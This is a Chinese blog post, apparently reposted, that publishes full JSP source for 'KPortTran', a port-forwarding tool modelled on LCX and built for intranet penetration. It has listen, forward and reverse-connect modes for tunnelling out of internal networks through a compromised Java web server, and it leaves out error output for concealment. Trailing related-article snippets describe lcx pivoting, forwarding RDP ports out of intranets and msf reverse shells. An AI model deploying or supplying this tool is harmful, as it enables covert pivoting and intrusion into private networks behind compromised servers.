最近接触内网很多,渗透过程中,由于windows和linux的差别以及运行语言环境的限制导致端口转发经常出现问题。于是自己写了个简单的JSP的端口转发脚本。仿造LCX的功能,具有正向、反向、监听三种模式。对于目前数量众多的JAVA WEB网站来说,可以比较方便的实现端口转发。

在这里发布出来,小伙伴们使用过程中,如果发现什么bug欢迎提交~

用法如下 KPortTran Usage:

参数

xxx.com/KPortTran.jsp? lip = local ip / 本地ip //一般为内网主机IP lp = local port / 本地端口 //一般为内网主机端口 rip = remote ip / 远程ip //一般为外网连接者IP,或者内网其他主机 rp = remote port / 远程端口 //一般为外网连接者端口 lp2 = local port2 / 本地端口2 //本地监听转发时的第二个端口 m = mode / 运行模式 //合法的值有:listen tran slave三种

运行模式

m = listen 需要参数:lp、lp2 该模式下,会在本地监听两个端口,相互转发数据 m = tran 需要参数:lip、lp、rip、rp 该模式为正向转发下,会在本地的lip上监听lp端口,当有连接建立时,再连接rip的rp端口。并将lip的lp上接收到的数据发向rip主机的rp端口。 m = slave 需要的参数: lip、lp、rip、rp 该模式为反向转发,会分别连接主机lip的lp端口 和 主机rip的rp端口。并转发两者数据,可用于内网反连。

注意事项: 某些server上使用时,可能由于编码问题会报错,请根据实际情况,更改代码首行的编码设置。 为了隐蔽,没有设置错误信息返回。如果不能执行,请检查一下参数。

测试截图: 

<%@page pageEncoding="GBK"%>

<%@page import="java.io.*"%>

<%@page import="java.util.*"%>

<%@page import="java.nio.charset.*"%>

<%@page import="javax.servlet.http.HttpServletRequestWrapper"%>

<%@page import="java.net.*"%>

<%

/*code by KingX*/

class KPortTran {

	public void listen(String port1, String port2) {

		ServerSocket listenServerSocket = null;

		ServerSocket outServerSocket = null;

		try {

			listenServerSocket = new ServerSocket(Integer.parseInt(port1));

			outServerSocket = new ServerSocket(Integer.parseInt(port2));

		} catch (NumberFormatException e) {

		} catch (IOException e) {

		}

		Socket listenSocket = null;

		Socket outSocket = null;

		try {

			while (true) {

				listenSocket = listenServerSocket.accept();

				outSocket = outServerSocket.accept();

				new tranThread(outSocket, listenSocket).start();

				new tranThread(listenSocket, outSocket).start();

				Thread.sleep(200);

			}

		} catch (Exception e) {

	  }

	}

	public void slave(String targetIP, String port1, String srcIP, String port2) throws IOException {

		InetAddress src = InetAddress.getByName(srcIP);

		InetAddress dest = InetAddress.getByName(targetIP);

		int p1 = Integer.parseInt(port1);

		int p2 = Integer.parseInt(port2);

		new Server(src, p2, dest, p1, true);

	}

	public void tran(String srcIP, String port1, String targetIP, String port2)

			throws NumberFormatException, IOException {

		InetAddress src = InetAddress.getByName(srcIP);

		InetAddress dest = InetAddress.getByName(targetIP);

		int p1 = Integer.parseInt(port1);

		int p2 = Integer.parseInt(port2);

		new Server(src, p1, dest, p2, false);

	}

class tranThread extends Thread {

	Socket in;

	Socket out;

	InputStream is;

	OutputStream os;

	public tranThread(Socket in, Socket out) throws IOException {

		this.is = in.getInputStream();

		this.os = out.getOutputStream();

		this.in = in;

		this.out = out;

	}

	private void closeSocket() {

		try {

			is.close();

			os.close();

			in.close();

			out.close();

		} catch (IOException e) {

		}

	}

	@Override

	public void run() {

		super.run();

		byte[] buffer = new byte[4096];

		int len = -1;

		try {

			while (true) {

				if (in.isClosed() || out.isClosed()|| (len = is.read(buffer, 0, buffer.length)) == -1) {

					break;

				} else {

					os.write(buffer, 0, len);

					os.flush();

				}

			}

		} catch (IOException e) {

			closeSocket();

		} finally {

			closeSocket();

		}

	}

}

class Server extends Thread {

	InetAddress src;

	InetAddress dest;

	int p1, p2;

	boolean reverse = false;

	public Server(InetAddress srcIP, int srcPort, InetAddress targetIP,

			int targetPort, boolean flag) {

		this.src = srcIP;

		this.dest = targetIP;

		this.p1 = srcPort;

		this.p2 = targetPort;

		this.reverse = flag;

		start();

	}

	@Override

	public void run() {

		super.run();

		if (reverse) {

			try {

				Socket s = new Socket(src, p1);

				Socket s2 = new Socket(dest, p2);

				new tranThread(s, s2).start();

				new tranThread(s2, s).start();

				while (true) {

					if (s2.isClosed() || s.isClosed()) {

						if (s2.isClosed()) {

							s2 = new Socket(dest, p2);

						}

						if (s.isClosed()) {

							s = new Socket(src, p1);

						}

						new tranThread(s, s2).start();

						new tranThread(s2, s).start();

					}

					Thread.sleep(1000);

				}

			} catch (IOException e) {

			} catch (InterruptedException e) {

			}

		} else {

			ServerSocket ss;

			try {

				ss = new ServerSocket(p1, 5, src);

				while (true) {

					Socket s = ss.accept();

					Socket s2 = new Socket(dest, p2);

					new tranThread(s, s2).start();

					new tranThread(s2, s).start();

				}

			} catch (IOException e) {

				e.printStackTrace();

			}

		}

	}

}

}

%>

<%

final String localIP = request.getParameter("lip");

final String localPort = request.getParameter("lp");

final String localPort2 = request.getParameter("lp2");

final String remoteIP =request.getParameter("rip");

final String remotePort =request.getParameter("rp");

final String mode =request.getParameter("m");

KPortTran pt = new KPortTran();

if (mode.equals("tran")) {

	pt.tran(localIP, localPort, remoteIP , remotePort);

}

if (mode.equals("slave")) {

	pt.slave(localIP, localPort, remoteIP , remotePort);

}

if (mode.equals("listen")) {

	pt.listen(localPort, localPort2);

}

%>

本文转载至,http://www.2cto.com/Article/201310/254016.html

JSP版LCX:端口转发神器 KPortTran的更多相关文章

  1. lcx端口转发 linux版

    一.端口转发使用 1.攻击机上执行以下命令 ./lcx -p1 -p2 -m 在本地监听3389端口,并将发送到本机3389端口的数据传递到本机2222端口 2.跳板机上执行以下命令 ./lcx -h ...

  2. vIDC v2.0 强大的端口转发神器使用总结-开放内网tfs代码服务

    vIDC2.0 端口映射工具,最近在公司闲来无事,想自己整个tfs来管理自己的研究代码. 本来是想用微软Visual Studio提供的免费tfs,但是无奈速度太慢.他们的服务器在美国,中国也没有代理 ...

  3. LCX端口转发实现内网突破

    工具:lcx.exe 原理:当目标主机仅开放了web服务,而该服务又仅能供内网用户使用,外网用户根本无法直接访问.因此想要让外网用户能能够访问局域网中的系统服务,必须进行端口映射等操作才行.其原理就是 ...

  4. lcx 端口转发

    1.查看3389端口开放情况: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStati ...

  5. lcx端口转发

    目录 0x01 正向端口转发 0x02 反向端口转发 0x03 msf正向shell 0x04 msf反向shell 注: 边界机器 win08 192.168.222.175 内网机器 win7 1 ...

  6. [内网渗透]lcx端口转发

    0x01 简介 lcx是一款端口转发工具,有三个功能: 第一个功能将本地端口转发到远程主机某个端口上 第二个功能将本地端口转发到本地另一个端口上 第三个功能是进行监听并进行转发使用 Lcx使用的前提是 ...

  7. linux下内网端口转发工具:linux版lcx [实现远程内网维护]

    这个工具以前使用的初衷是内网渗透,需要将内网ssh端口转发到外网服务器上.但这个工具同样适用于运维工程师进行远程内网维护. 当然这一切的前提是内网可以访问外网,检测方法当然就是直接ping 一个外网I ...

  8. 端口转发 Port Forwarding (一)

    0x00First 最近发现一些好用的端口转发工具和技巧,计划认真梳理一下 SSH.NC.LCX.EW.FRP 0x01 SSH隧道端口转发 目前利用SSH隧道(SSH tunneling)进行端口转 ...

  9. 【转】实战 SSH 端口转发

    本文转自:http://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/index.html,至于有什么用,懂的懂! 实战 SSH 端口转发 通 ...

随机推荐

  1. Codeforces Round #228 (Div. 1) C 贪心

    嘎嘎,今天被一些事耽误了,可是还是A了几个题目,这道题还不错 题目链接: 题意:两个人玩游戏,有N堆纸牌,纸牌上有数字,A每次仅仅能取N堆中的 当中一个的顶部的 纸牌,B仅仅能取N堆中的当中一个底部 ...

  2. bg和fg命令

    linux提供的fg和bg命令,可以让我们轻松调度正在运行的任务   假如你发现前天运行的一个程序需要很长的时间,但是需要干前天的事情,你就可以用ctrl-z挂起这个程序,然后可以看到系统的提示: [ ...

  3. 一段测试try...catch运行时间的代码

    public class Test2 { private static int test() {         int i=1; try {             i=2;             ...

  4. Java中将InputStream读取为String, 各种方法的性能对比

    如下, 一共存在11种实现方式及其对应的性能测试结果: 1. 使用IOUtils.toString (Apache Utils) String result = IOUtils.toString(in ...

  5. 使用canvas制作一个移动端画板

    概述 使用canvas做一个画板,代码里涵盖了一些canvas绘图的基本思想,各种工具的类也可以分别提出来用 详细 代码下载:http://www.demodashi.com/demo/10503.h ...

  6. 用curl去探测接口是否正常返回结果,若没有正常返回则触发报警

    现有一需求去curl 在香港的一个接口, 返回值有时正常有时报错 connection reset by peer . 思路: 若 执行成功 $?返回 0  , 不成功则返回其他数字 #!/bin/b ...

  7. android 添加桌面快捷方式

    .在桌面创建快捷方式方法: 方法一:通过长按某一个应用程序的图标在桌面上创建启动该应用程序的快捷方式. 这个方法安装完程序都用户都能实现. 方法二:在应用程序中构建一个Intent,然后以Broadc ...

  8. CoreText实现图文混排之文字环绕及点击算法

    系列文章: CoreText实现图文混排:http://www.jianshu.com/p/6db3289fb05d CoreText实现图文混排之点击事件:http://www.jianshu.co ...

  9. python学习笔记——multiprocessing 多进程组件 Pipe管道

    进程间通信(IPC InterProcess Communication)是值在不同进程间传播或交换信息. IPC通过有管道(无名管道 和 有名 / 命名管道).消息队列.共享存储 / 内容.信号量. ...

  10. Jquery与mootools对比

    换了新公司以后就很少使用原生Js来实现界面交互了,而是更多的依赖Jquery. 1.Jquery优点: 良好的一致性$().().xxxxx与强大的DOM api组件可以让一个js菜鸟一周之类立马开发 ...